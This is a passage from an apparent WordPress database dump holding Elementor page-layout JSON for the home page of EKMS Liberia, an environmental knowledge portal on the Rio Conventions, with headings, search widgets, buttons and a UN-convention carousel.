later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11509,1867,'_elementor_version','2.7.5'),(11510,1867,'_elementor_template_type','wp-page'),(11511,1867,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11515,1868,'_wp_page_template','default'),(11516,1868,'_elementor_edit_mode','builder'),(11517,1868,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center 